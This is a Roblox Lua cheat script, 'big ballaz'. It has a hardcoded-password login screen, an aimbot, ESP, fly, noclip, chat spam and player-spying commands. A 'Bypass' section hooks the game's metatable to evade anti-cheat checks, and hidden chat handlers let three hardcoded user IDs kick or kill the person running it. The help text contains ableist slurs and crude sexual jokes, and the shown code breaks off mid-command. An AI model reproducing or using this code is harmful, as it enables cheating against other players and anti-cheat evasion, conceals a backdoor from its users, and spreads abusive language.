-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local LogInBack = Instance.new("Frame")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local Pass = Instance.new("TextBox")
local UICorner_2 = Instance.new("UICorner")
local Login = Instance.new("TextBox")
local UICorner_3 = Instance.new("UICorner")
local Frame_2 = Instance.new("Frame")
local Frame_3 = Instance.new("Frame")
local cock = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local Frame_4 = Instance.new("Frame")
local LoadFrame = Instance.new("Frame")
local Frame_5 = Instance.new("Frame")
local TextLabel_3 = Instance.new("TextLabel")
local TextLabel_4 = Instance.new("TextLabel")
local pog = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

LogInBack.Name = "LogInBack"
LogInBack.Parent = ScreenGui
LogInBack.BackgroundColor3 = Color3.fromRGB(14, 14, 14)
LogInBack.BorderColor3 = Color3.fromRGB(86, 0, 232)
LogInBack.Position = UDim2.new(0.430677861, 0, 0.379706025, 0)
LogInBack.Size = UDim2.new(0, 265, 0, 200)

Frame.Parent = LogInBack
Frame.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
Frame.BorderColor3 = Color3.fromRGB(86, 0, 232)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.0584546365, 0, 0.0649999976, 0)
Frame.Size = UDim2.new(0, 237, 0, 174)

UICorner.CornerRadius = UDim.new(0.150000006, 0)
UICorner.Parent = Frame

Pass.Name = "Pass"
Pass.Parent = Frame
Pass.BackgroundColor3 = Color3.fromRGB(17, 17, 17)
Pass.Position = UDim2.new(0.0754852965, 0, 0.494252861, 0)
Pass.Size = UDim2.new(0, 200, 0, 27)
Pass.Font = Enum.Font.Roboto
Pass.Text = "PASSWORD"
Pass.TextColor3 = Color3.fromRGB(255, 255, 255)
Pass.TextSize = 14.000
Pass.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

UICorner_2.CornerRadius = UDim.new(0.100000001, 0)
UICorner_2.Parent = Pass

Login.Name = "Login"
Login.Parent = Frame
Login.BackgroundColor3 = Color3.fromRGB(17, 17, 17)
Login.Position = UDim2.new(0.0754852965, 0, 0.287356317, 0)
Login.Size = UDim2.new(0, 200, 0, 25)
Login.Font = Enum.Font.Roboto
Login.Text = "USERNAME"
Login.TextColor3 = Color3.fromRGB(255, 255, 255)
Login.TextSize = 14.000

UICorner_3.CornerRadius = UDim.new(0.100000001, 0)
UICorner_3.Parent = Login

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(86, 0, 232)
Frame_2.Position = UDim2.new(0, 18, 0, 75)
Frame_2.Size = UDim2.new(0, 200, 0, 0)

Frame_3.Parent = Frame
Frame_3.BackgroundColor3 = Color3.fromRGB(86, 0, 232)
Frame_3.Position = UDim2.new(0, 18, 0, 113)
Frame_3.Size = UDim2.new(0, 200, 0, 0)

cock.Name = "cock"
cock.Parent = Frame
cock.BackgroundColor3 = Color3.fromRGB(17, 17, 17)
cock.BorderColor3 = Color3.fromRGB(86, 0, 132)
cock.BorderSizePixel = 0
cock.Position = UDim2.new(0, 58, 0, 130)
cock.Size = UDim2.new(0, 121, 0, 30)
cock.Font = Enum.Font.Ubuntu
cock.Text = "LOG-IN"
cock.TextColor3 = Color3.fromRGB(255, 255, 255)
cock.TextSize = 14.000

UICorner_4.CornerRadius = UDim.new(0.100000001, 0)
UICorner_4.Parent = cock

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0, -28, 0, 0)
TextLabel.Size = UDim2.new(0, 130, 0, 25)
TextLabel.Font = Enum.Font.RobotoMono
TextLabel.Text = "Big"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 20.000

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0, 18, 0, 0)
TextLabel_2.Size = UDim2.new(0, 130, 0, 25)
TextLabel_2.Font = Enum.Font.RobotoMono
TextLabel_2.Text = "Ballaz"
TextLabel_2.TextColor3 = Color3.fromRGB(86, 0, 232)
TextLabel_2.TextSize = 20.000

Frame_4.Parent = Frame
Frame_4.BackgroundColor3 = Color3.fromRGB(86, 0, 232)
Frame_4.Position = UDim2.new(0, 57, 0, 160)
Frame_4.Size = UDim2.new(0, 120, 0, 0)

LoadFrame.Name = "LoadFrame"
LoadFrame.Parent = ScreenGui
LoadFrame.BackgroundColor3 = Color3.fromRGB(13, 13, 13)
LoadFrame.BackgroundTransparency = 0.200
LoadFrame.Position = UDim2.new(0, 795, 0, 369)
LoadFrame.Size = UDim2.new(0, 340, 0, 100)
LoadFrame.Visible = false

Frame_5.Parent = LoadFrame
Frame_5.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_5.BorderColor3 = Color3.fromRGB(61, 61, 74)
Frame_5.Position = UDim2.new(0, 0, 0, 29)
Frame_5.Size = UDim2.new(0, 340, 0, 0)

TextLabel_3.Parent = LoadFrame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Size = UDim2.new(0, 74, 0, 21)
TextLabel_3.Font = Enum.Font.RobotoMono
TextLabel_3.Text = "big"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 17.000

TextLabel_4.Parent = LoadFrame
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0, 44, 0, 0)
TextLabel_4.Size = UDim2.new(0, 66, 0, 21)
TextLabel_4.Font = Enum.Font.RobotoMono
TextLabel_4.Text = "ballaz"
TextLabel_4.TextColor3 = Color3.fromRGB(86, 0, 232)
TextLabel_4.TextSize = 17.000
TextLabel_4.TextStrokeColor3 = Color3.fromRGB(86, 0, 232)
TextLabel_4.TextStrokeTransparency = 0.800

pog.Name = "pog"
pog.Parent = LoadFrame
pog.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
pog.BackgroundTransparency = 1.000
pog.Position = UDim2.new(0, 92, 0, 44)
pog.Size = UDim2.new(0, 155, 0, 29)
pog.Font = Enum.Font.RobotoMono
pog.Text = "Downloading.."
pog.TextColor3 = Color3.fromRGB(255, 255, 255)
pog.TextSize = 16.000

TextButton.Parent = LoadFrame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.Position = UDim2.new(0, 132, 0, 73)
TextButton.Size = UDim2.new(0, 65, 0, 21)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Cancel"
TextButton.TextColor3 = Color3.fromRGB(86, 0, 232)
TextButton.TextSize = 17.000
TextButton.TextStrokeColor3 = Color3.fromRGB(86, 0, 232)
TextButton.TextStrokeTransparency = 0.700

-- Scripts:

local function CSFR_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	local a = script.Parent
	local thing = a.LoadFrame.pog
	local other = a.LogInBack.Frame.cock
	local Login = other.Parent.Login
	local Pass = other.Parent.Pass
	local Frame = other.Parent
	
	for i, v in pairs(script.Parent:GetChildren()) do
		if v:IsA("TextLabel") and v.Parent == script.Parent then
			v.Visible = false
		end
	end
	
	other.MouseButton1Down:Connect(function()
			if Login.Text == "Reaper" and Pass.Text == "lurkdaddy" or Login.Text == "Lurk" and Pass.Text == "cock" or Login.Text == "mikey" and Pass.Text == "bigballaz" then
				Frame.Parent.Visible = false
				wait(.2)
			Frame.Parent.Parent.LoadFrame.Visible = true
			
			thing.Text = "Downloading.."
			wait(2)
			thing.Text = "Checking Login Info.."
			wait(2)
			thing.Text = "Whitelisted!"
			wait(1)
			thing.Parent.Visible = false
			
			for i, v in pairs(script.Parent:GetChildren()) do
				if v:IsA("TextLabel") and v.Parent == script.Parent then
					v.Visible = true
				end
			end
			end
	print([[
		    	[1] flyspeed, fs  - As name suggests, lets you change your flyspeed 
		    	[2] fly - Just press f to fly bro.
			    [3] blink - Enables Blinkspeed
			    [4] bs, blinkspeed lets you change your blinkspeed 
			    [5] av, aimvelocity - Changes the velocity at which the aimlock predicts 
		    	[6] serverhop - Puts you in a different server
		    	[7] aim/aimbot/aimlock - Sets your AimTarget 
		    	[8] aimpart - Sets the part for which the aimlock to shoot at. 
				[9] esp, find - ESP's the Target
				[10] bfind, besp - Print's the targets backpack, showing you their items (LOOK IN F9 FOR THIS)
				[11] unesp, unfind - UnESP's the target. 
				[12] spam - Spam shit like the retard you are 
				[13] unspam - Stops you from being an autistic cunt 
				[14] uncamlock, uncam - unCamlocks you.
				[15] camlock, cam - Locks your camera to the target. 
				[16] r, reset - Resets you.
				[17] rc, removechairs - Removes chairs, so you never get stuck and raped by your stepbro. 
				[18] view - Lets you stalk people in the server! We all love this.
				[19] rejoin - rejoin..

				]]
				)


				-- inf stam
local LocalP = game.Players.LocalPlayer

LocalP.Character.Stamina.Changed:Connect(function()
	LocalP.Character:WaitForChild"Stamina"
	LocalP.Character.Stamina.Value = 100 
end)
LocalP.CharacterAdded:Connect(function()
	LocalP.Character:WaitForChild"Stamina"
	LocalP.Character.Stamina.Changed:Connect(function()
		LocalP.Character.Stamina.Value = 100 
	end)
end)
-- end of inf stam


local AdminPrefix = "~" 
local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
getgenv().AdminTable = {
	[28002028] = {["Access"] = 5};
	[655897769] = {["Access"] = 5};
	[395372136] = {["Access"] = 5};
}

getgenv().psearch = function(Name)
	local Inserted = {}
	for _, p in pairs(Players:GetPlayers()) do
		if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
			table.insert(Inserted, p);return p
		end
	end
end 

getgenv().AdminCmdList = {
	["kick"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP:Kick(self)
			end
		end;
		["Clearence"] = {[5] = true;};
	};
	["kill"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP.Character.Humanoid:ChangeState(15)
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
};

getgenv().BDCheck = function(Target2, Chat)
	if Chat:sub(1, 1) == AdminPrefix then
		local args = string.split(Chat:sub(2), " ")
		local Command = AdminCmdList[table.remove(args, 1)]
		local targ1 = psearch(table.remove(args, 1))
		if Command and targ1 then 
			return Command and Command["Clearence"][AdminTable[Target2.UserId].Access] and Command["CommandFunc"](targ1, table.concat(args, " "), Target2)
		end
	end
end

local GP = Players:GetPlayers()
for i = 1, #GP do
	local CoolKidPlayer = GP[i]
	CoolKidPlayer.Chatted:Connect(function(Word)
		BDCheck(CoolKidPlayer, Word)
	end)
end 
Players.PlayerAdded:Connect(function(CKP)
	CKP.Chatted:Connect(function(Message)
		BDCheck(CKP, Message)
	end)
end)

-- big ballaz

local LoadingTime = tick()
local Commands, Prefix = {}, ""
getgenv().Notify = function(title, text, icon, time)
	game:GetService("StarterGui"):SetCore(
	"SendNotification",
	{
		Title = title,
		Text = text,
		Icon = "",
		Duration = time
	}
	)
end

getgenv().SearchPlayers = function(Name)
	local Inserted = {}
	for _, p in pairs(game:GetService("Players"):GetPlayers()) do
		if string.lower(string.sub(p.Name, 1, string.len(Name))) == string.lower(Name) then
			table.insert(Inserted, p)
			return p
		end
	end
end

getgenv().GetInit = function(CName)
	for _, v in next, Commands do
		if v.Name == CName or table.find(v.Aliases, CName) then
			return v.Function
		end
	end
end

getgenv().RunCommand = function(Cmd)
	Cmd = string.lower(Cmd)
	pcall(
		function()
			if Cmd:sub(1, #Prefix) == Prefix then
				local Args = string.split(Cmd:sub(#Prefix + 1), " ")
				local CmdName = GetInit(table.remove(Args, 1))
				if CmdName and Args then
					return CmdName(Args)
				end
			end
		end
	)
end

local ScreenGui = Instance.new("ScreenGui")
local Cmdbar = Instance.new("TextBox")

local Frame = Instance.new("Frame")
local UIGradient = Instance.new("UIGradient")

coroutine.resume(
	coroutine.create(
		function()
			ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
			ScreenGui.ResetOnSpawn = false

			Cmdbar.Name = "Cmdbar"
			Cmdbar.Parent = ScreenGui
			Cmdbar.BorderColor3 = Color3.fromRGB(86, 0, 232)
			Cmdbar.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
			Cmdbar.BorderSizePixel = 1
			Cmdbar.Position = UDim2.new(0, 0, 0.633333333333, 0)
			Cmdbar.Size = UDim2.new(0, 0, 0, 20)
			Cmdbar.SizeConstraint = Enum.SizeConstraint.RelativeYY
			Cmdbar.Font = Enum.Font.GothamBlack
			Cmdbar.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
			Cmdbar.Text = ""
			Cmdbar.TextColor3 = Color3.fromRGB(255, 255, 255)
			Cmdbar.TextSize = 14.000
			Cmdbar.Visible = false



			Frame.Parent = Cmdbar
			Frame.BackgroundTransparency = 1
			Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
			Frame.BorderSizePixel = 0
			Frame.Position = UDim2.new(0.005, 0, 0, 0)
			Frame.Size = UDim2.new(0, 91, 0, 100)
			local UIListLayout = Instance.new("UIListLayout", Frame)
			UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
		end
	)
)

local Uis = game:GetService("UserInputService")
Uis.InputBegan:Connect(
	function(Key, Typing)
		if Typing then
			return
		end
		if Key.KeyCode == Enum.KeyCode.Semicolon then
			Cmdbar.Visible = true
			Cmdbar.Text = ""
			wait()
			Cmdbar:CaptureFocus()
			Cmdbar:TweenSize(UDim2.new(0, 419, 0, 20), "Out", "Quad", 0.1, true)

		end
	end
)
Cmdbar.FocusLost:Connect(
	function(Foc)
		if Foc == true then
			Cmdbar.Visible = false
			Cmdbar:TweenSize(UDim2.new(0, 0, 0, 20), "Out", "Quad", 0.1, true)
			RunCommand(Cmdbar.Text)
		end
	end
)
Uis.InputEnded:Connect(
	function(Key)
		if Key.KeyCode.Name == "LeftAlt" then
			Cmdbar.Visible = false
		end
	end
)

-- [[ locals ]] --
local Players, RService, RStorage, VUser, SGui, TPService =
	game:GetService("Players"),
game:GetService("RunService"),
game:GetService("ReplicatedStorage"),
game:GetService("VirtualUser"),
game:GetService("StarterGui"),
game:GetService("TeleportService")
local Client, Mouse, Camera, CF, INew, Vec3, Vec2, UD2, UD =
	Players.LocalPlayer,
Players.LocalPlayer:GetMouse(),
workspace.CurrentCamera,
CFrame.new,
Instance.new,
Vector3.new,
Vector2.new,
UDim2.new,
UDim.new
local Noclip, Blink, Esp, Flying, Noseats = true, true, false, false, false
local Aimbot, Viewing, Camlock = false, false, false
local AimbotTarget, ViewTarget, CamlockTarget, EspTarget = nil, nil, nil, nil

local Flyspeed, Aimvelocity, Blinkspeed = 13, 7, 1
local AimPart, CamPart = "Torso", "Torso"
local StreetsID, PrisonID = 455366377, 4669040
local AFK = false
local WalkShoot = true
local Normalwalk = false
local WalkSpeed = 16
local NormalWs = 16
local SprintSpeed = 25

-- [[ functions ]] --
local AimPartTable = {
	["torso"] = "Torso",
	["head"] = "Head"
}
local KeysTable = {
	["W"] = false,
	["A"] = false,
	["S"] = false,
	["D"] = false,
	["LeftControl"] = false,
	["LeftShift"] = false
}

local function ChatSpy()
	local ChatSpyFrame = Client.PlayerGui.Chat.Frame
	ChatSpyFrame.ChatChannelParentFrame.Visible = true
	ChatSpyFrame.ChatBarParentFrame.Position =
		ChatSpyFrame.ChatChannelParentFrame.Position + UD2(UD(), ChatSpyFrame.ChatChannelParentFrame.Size.Y)
end
ChatSpy()
game:GetService("UserInputService").InputBegan:Connect(function(Key,Processed)
	if Processed then return end
	if Key.KeyCode == Enum.KeyCode.T then
		if Aimbot == true then
			Aimbot = false
			Notify("big ballaz", "Aimlocking: " .. tostring(Aimbot), "", 3)
		else
			Aimbot = true  
			Notify("big ballaz", "Aimlocking: " .. tostring(Aimbot), "", 3)
		end
	end
end)

local function ConfirmCallbacks()
	wait()
	SGui:SetCore("ResetButtonCallback", true)
end
ConfirmCallbacks()

getgenv().ResetCharacter = function()
	if Client and Client.Character and Client.Character:FindFirstChild("Humanoid") then
		Client.Character.Humanoid:ChangeState(15)
	end
end

getgenv().EspPlayer = function(Dude)




	local bgui2 = Instance.new("BillboardGui", Dude.Character.Head)
	local tlabel2 = Instance.new("TextLabel", bgui2)



	local function HasItem(Dude,Item)
		if Dude then 
			local ItemFound = Dude.Character:FindFirstChild(Item,true) or Dude.Backpack:FindFirstChild(Item,true)
			return ItemFound and "Yes" or "No" 
		end 
	end





	local AdminUserTable = {}
	local User = AdminUserTable[Dude] and "Yes" or "No"


	local B = Instance.new('BillboardGui',Dude.Character.Head)
	B.Adornee = Dude.Character.Head
	B.Size = UDim2.new(0,100,0,100)
	B.StudsOffset = Vector3.new(0,1,0)
	B.AlwaysOnTop = true 

	local C = Instance.new('TextLabel',B)
	C.BackgroundTransparency = 1
	C.Position = UDim2.new(0,0,0,0)
	C.Size = UDim2.new(1,0,0,40)
	C.TextStrokeTransparency = 0.5
	C.TextSize = 12
	C.TextColor3 = Color3.fromRGB(255,255,255)
	C.TextStrokeColor3 = Color3.fromRGB(0,0,0)




	game:GetService("RunService").RenderStepped:Connect(function()
		C.Text =
			Dude.Name ..
			" [" .. " Health: " ..
			math.floor(Dude.Character.Humanoid.Health) ..
			"/" ..
			math.floor(Dude.Character.Humanoid.MaxHealth) ..
			"]" ..
			" Distance: " .. "[".. 
			math.floor(Dude:DistanceFromCharacter(Client.Character.Head.Position)) ..
			"]".. " | Glock: [".. HasItem(Dude,"Glock").."] | Shotty: ["..HasItem(Dude,"Shotty").."]" .. " | Vest: [".. HasItem(Dude,"BulletResist") .. "]" .. " | Uzi: " .. "[" .. HasItem(Dude,"Uzi") .. "]"
















	end)
end




local mt = getrawmetatable(game)
local backup
backup =
	hookfunction(
		mt.__newindex,
		newcclosure(
			function(self, key, value)
			if key == "WalkSpeed" and value < 16 then
				value = 16
			end
			return backup(self, key, value)
		end
		)
	)

getgenv().togglefly = function()
	Flying = not Flying
	Notify("big ballaz", "Flying: " .. tostring(Flying), "", 3)
	local T = Client.Character:FindFirstChild("HumanoidRootPart") or Client.Character:FindFirstChild("Torso")
	local BV, BG = INew("BodyVelocity", T), INew("BodyGyro", T)
	BV.Velocity = Vec3(0, 0.1, 0)
	BV.MaxForce = Vec3(math.huge, math.huge, math.huge)
	BG.CFrame = T.CFrame
	BG.P = 9e9
	BG.MaxTorque = Vec3(9e9, 9e9, 9e9)
	local FlyPart = INew("Part", workspace)
	FlyPart.Anchored = true
	FlyPart.Size = Vec3(6, 1, 6)
	FlyPart.Transparency = 1

	while Flying == true and Client and Client.Character and Client.Character:FindFirstChild("Humanoid") and
		Client.Character.Humanoid.Health ~= 0 and
		RService.Heartbeat:Wait() and
		T do
		local Front, Back, Left, Right = 0, 0, 0, 0
		if KeysTable["W"] == true then
			Front = Flyspeed
		elseif not KeysTable["W"] == true then
			Front = 0
		end
		if KeysTable["A"] == true then
			Right = -Flyspeed
		elseif not KeysTable["A"] == true then
			Right = 0
		end
		if KeysTable["S"] == true then
			Back = -Flyspeed
		elseif not KeysTable["S"] == true then
			Back = 0
		end
		if KeysTable["D"] == true then
			Left = Flyspeed
		elseif not KeysTable["D"] == true then
			Left = 0
		end
		if tonumber(Front + Back) ~= 0 or tonumber(Left + Right) ~= 0 then
			BV.Velocity =
				((Camera.CoordinateFrame.lookVector * (Front + Back)) +
					((Camera.CoordinateFrame * CF(Left + Right, (Front + Back) * 0.2, 0).p) - Camera.CoordinateFrame.p)) *
				50
		else
			BV.Velocity = Vec3(0, 0.1, 0)
		end
		BG.CFrame = Camera.CoordinateFrame
	end
	FlyPart:Destroy()
	BG:Remove()
	BV:Remove()
end

Uis.InputBegan:Connect(
	function(Key)
		if not (Uis:GetFocusedTextBox()) then
			if Key.KeyCode == Enum.KeyCode.W then
				KeysTable["W"] = true
			end
			if Key.KeyCode == Enum.KeyCode.A then
				KeysTable["A"] = true
			end
			if Key.KeyCode == Enum.KeyCode.S then
				KeysTable["S"] = true
			end
			if Key.KeyCode == Enum.KeyCode.D then
				KeysTable["D"] = true
			end
			if Key.KeyCode == Enum.KeyCode.F then
				if FirstFly == true then
					Notify("big ballaz v1", "You can now fly, like a bird.", "", 3)
					FirstFly = false
				end
				togglefly()
			end
			if Key.KeyCode == Enum.KeyCode.X then
				Noclip = not Noclip
				Notify("big ballaz", "Noclip: " .. tostring(Noclip), "", 3)
			end
			if Key.KeyCode == Enum.KeyCode.LeftShift then
				KeysTable["LeftShift"] = true
				while Blink == true and KeysTable["LeftShift"] == true and Client and Client.Character and
					RService.Heartbeat:Wait() do
					local ClientRF =
						Client.Character:FindFirstChild("HumanoidRootPart") or Client.Character:FindFirstChild("Torso")
					local Hum = Client.Character:FindFirstChild("Humanoid")
					ClientRF.CFrame =
						ClientRF.CFrame +
						Vec3(
							Hum.MoveDirection.X * Blinkspeed,
							Hum.MoveDirection.Y * Blinkspeed,
							Hum.MoveDirection.Z * Blinkspeed
						)
				end
			end
		end
	end
)
Uis.InputEnded:Connect(
	function(Key --[[Typing]])
		if not (Uis:GetFocusedTextBox()) then
			if Key.KeyCode == Enum.KeyCode.W then
				KeysTable["W"] = false
			end
			if Key.KeyCode == Enum.KeyCode.A then
				KeysTable["A"] = false
			end
			if Key.KeyCode == Enum.KeyCode.S then
				KeysTable["S"] = false
			end
			if Key.KeyCode == Enum.KeyCode.D then
				KeysTable["D"] = false
			end
			if Key.KeyCode == Enum.KeyCode.LeftShift then
				KeysTable["LeftShift"] = false
			end
		end
	end
)

-- [[ Bypass ]] --
local rm = getrawmetatable(game) or debug.getrawmetatable(game) or getmetatable(game)
if setreadonly then
	setreadonly(rm, false)
else
	make_writeable(rm, true)
end
local caller, cscript = checkcaller or is_protosmasher_caller, getcallingscript or get_calling_script
local rindex, nindex, ncall, closure = rm.__index, rm.__newindex, rm.__namecall, newcclosure or read_me

rm.__newindex =
	closure(
		function(self, Meme, Val)
		if caller() then
			return nindex(self, Meme, Val)
		end
		if game.PlaceId ~= (StreetsID) then
			if Meme == "WalkSpeed" then
				return 16
			end
			if Meme == "JumpPower" then
				return 37.5
			end
			if Meme == "HipHeight" then
				return 0
			end
			if Meme == "Health" then
				return 100
			end
		end
		if self:IsDescendantOf(Client.Character) and self.Name == "HumanoidRootPart" or self.Name == "Torso" then
			if Meme == "CFrame" or Meme == "Position" or Meme == "Anchored" then
				return nil
			end
		end
		return nindex(self, Meme, Val)
	end
	)
rm.__namecall =
	closure(
		function(self, ...)
		local Args, Method = {...}, getnamecallmethod() or get_namecall_method()
		if Method == "BreakJoints" then
			return wait(9e9)
		end
		if game.PlaceId ~= (StreetsID) then
			if Method == "FireServer" and not self.Name == "SayMessageRequest" then
				if tostring(self.Parent) == "ReplicatedStorage" or self.Name == "lIII" then
					return wait(9e9)
				end
				if Args[1] == "hey" then
					return wait(9e9)
				end
			end
			if Method == "FireServer" and self.Name == "Fire" and AimbotTarget ~= nil and Aimbot == true then
				return ncall(
					self,
					AimbotTarget.Character[AimPart].CFrame + AimbotTarget.Character[AimPart].Velocity / Aimvelocity
				)
			end
		end
		if game.PlaceId == (StreetsID) then
			if Method == "FireServer" and Args[1] == "WalkSpeed" or Args[1] == "JumpPower" or Args[1] == "HipHeight" then
				return nil
			end
			if Method == "FireServer" and self.Name == "Input" then
				if Args[1] == "bv" or Args[1] == "hb" or Args[1] == "ws" then
					return wait(9e9)
				end
			end
			if Method == "FireServer" and self.Name == "Input" and AimbotTarget ~= nil and Aimbot == true then
				Args[2].mousehit =
					AimbotTarget.Character[AimPart].CFrame + AimbotTarget.Character[AimPart].Velocity / Aimvelocity
				Args[2].velo = math.huge
				return ncall(self, unpack(Args))
			end
		end
		return ncall(self, unpack(Args))
	end
	)
if setreadonly then
	setreadonly(rm, true)
else
	make_writeable(rm, false)
end

-- [[ CharacterAdded/Died ]] --
Client.Character.Humanoid.Died:Connect(
	function()
		if Flying then
			togglefly()
		end
	end
)
Client.CharacterAdded:Connect(
	function()
		repeat
			wait()
		until Client.Character:FindFirstChild("Humanoid")
		Client.Character.Humanoid.Died:Connect(
			function()
				if Flying then
					togglefly()
				end
			end
		)
	end
)
Commands["fuck"] = {
	["Aliases"] = {"besp", "bfind"},
	["Function"] = function(Args)
		if Args[1] then
			BackTarget = SearchPlayers(Args[1])
			if BackTarget then
				print(BackTarget.Name .. "'s Backpack = {")
				print("-------------------------")
				local Back = BackTarget.Backpack:GetChildren()
				for i, v in pairs(Back)do
					if v:IsA("Tool") and v.Parent == BackTarget.Backpack or v.Parent == BackTarget.Character
					then 
						print(v)
					end
				end
				print("-------------------------")
				print("}")
			end
		end
		Notify("big ballaz", "Checking Backpack of: " .. tostring(BackTarget), "", 3)
	end
}

Commands["spam shit like an ape"] = {
	["Aliases"] = {"spam"},
	["Function"] = function(Args)
		if Args[1] then
			local AFKMessage = table.concat(Args, " ")
			AFK = not AFK
			if (not AFK) then
				return
			end
			spawn(
				function()
					while AFK do
						wait(0.5)
						game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(AFKMessage, "All")
					end
				end
			)
		end
	end

}


Commands["| fs, flyspeed -|- Sets your Flyspeed |"] = {
	["Aliases"] = {"flyspeed", "fs"},
	["Function"] = function(Args)
		if Args[1] then
			Flyspeed = tonumber(Args[1])
			Notify("big ballaz", "Flyspeed: " .. tonumber(Flyspeed), "", 3)
		end
	end
}

Commands["unspam"] = {
	["Aliases"] = {"unspam"},
	["Function"] = function()
		AFK = false

	end
}

Commands["| fly, togglefly -|- Toggles Fly |"] = {
	["Aliases"] = {"fly", "togglefly"},
	["Function"] = function(Args)
		togglefly()
	end
}

Commands["| fov, fieldofview -|- Sets your FieldOfView |"] = {
	["Aliases"] = {"fieldofview", "fov"},
	["Function"] = function(Args)
		if Args[1] then
			Camera.FieldOfView = tonumber(Args[1])
		end
		Notify("big ballaz", "FieldOfView: " .. tonumber(Args[1]), "", 3)
	end
}
Commands["| blink -|- Toggles Blink |"] = {
	["Aliases"] = {"blink", "blinkspd"},
	["Function"] = function(Args)
		Blink = not Blink
		Notify("big ballaz", "Blink: " .. tostring(Blink), "", 3)
	end
}
Commands["| esp, find -|- Esp a Player |"] = {
	["Aliases"] = {"esp", "find"},
	["Function"] = function(Args)
		if Args[1] then
			EspTarget = SearchPlayers(Args[1])
			if EspTarget then
				EspPlayer(EspTarget)

			end
		end
		Notify("big ballaz", "Esp Target: " .. tostring(EspTarget), "", 3)
	end
}


Commands["| unesp, unfind -|- UnEsp Esp'd Player |"] = {
	["Aliases"] = {"unesp", "unfind"},
	["Function"] = function(Args)
		if Args[1] then
			local UnEspPlayer
			UnEspPlayer = SearchPlayers(Args[1])
			if UnEspPlayer then
				for _, v in next, UnEspPlayer.Character:GetDescendants() do
					if v:IsA("BillboardGui") or v:IsA("TextLabel") or v:IsA("BoxHandleAdornment") then
						v:Destroy() 

					end
				end
			end
		end
	end
}
Commands["| rj, rejoin -|- Rejoins Current Game |"] = {
	["Aliases"] = {"rejoin", "rj"},
	["Function"] = function()
		TPService:Teleport(game.PlaceId, Client)
	end
}
Commands["| r, reset, re, res -|- Resets Your Character |"] = {
	["Aliases"] = {"r", "reset", "re", "res"},
	["Function"] = function()
		ResetCharacter()
	end
}
Commands["| cam, camlock, cl, cml -|- Sets Camlock Target |"] = {
	["Aliases"] = {"camlock", "cam", "cl", "cml"},
	["Function"] = function(Args)
		if Args[1] then
			CamlockTarget = SearchPlayers(Args[1])
			Camlock = true
		end
		Notify("big ballaz", "Camlock Target: " .. tostring(CamlockTarget), "", 3)
	end
}
Commands["| uncam, uncamlock, uncl, uncml -|- UnCamlocks Camlocked Target |"] = {
	["Aliases"] = {"uncamlock", "uncam", "uncl", "uncml"},
	["Function"] = function()
		CamlockTarget = nil
		Camlock = false
		Notify("big ballaz", "Camlock: " .. tostring(Camlock), "", 3)
	end
}
Commands["| aim, s, aimbot, shoot, aimlock -|- Sets Aimlock Target |"] = {
	["Aliases"] = {"aim", "s", "aimbot", "shoot", "aimlock"},
	["Function"] = function(Args)
		if Args[1] then
			AimbotTarget = SearchPlayers(Args[1])
			Aimbot = true
		end
		Notify("big ballaz", "Aim Target: " .. tostring(AimbotTarget), "", 3)
	end
}
Commands["| unaim, uns, unaimbot, unshoot -|- UnAimbots Aimbotted Target |"] = {
	["Aliases"] = {"unaim", "uns", "unaimbot", "unshoot"},
	["Function"] = function()
		AimbotTarget = nil
		Aimbot = false
		Notify("big ballaz", "Aim: " .. tostring(Aimbot), "", 3)
	end
}
Commands["| view -|- View a Player |"] = {
	["Aliases"] = {"view"},
	["Function"] = function(Args)
		if Args[1] then
			ViewTarget = SearchPlayers(Args[1])
			Viewing = true
		end
		Notify("big ballaz", "View Target: " .. tostring(ViewTarget), "", 3)
	end
}
Commands["| unview -|- UnView Viewed Target |"] = {
	["Aliases"] = {"unview"},
	["Function"] = function()
		ViewTarget = nil
		Viewing = false
		Camera.CameraSubject = Client.Character
		Notify("big ballaz", "Viewing: " .. tostring(Viewing), "", 3)
	end
}
Commands["| av/aimvelocity -|- Sets Aimvelocity |"] = {
	["Aliases"] = {"aimvelocity", "av"},
	["Function"] = function(Args)
		if Args[1] then
			Aimvelocity = tonumber(Args[1])
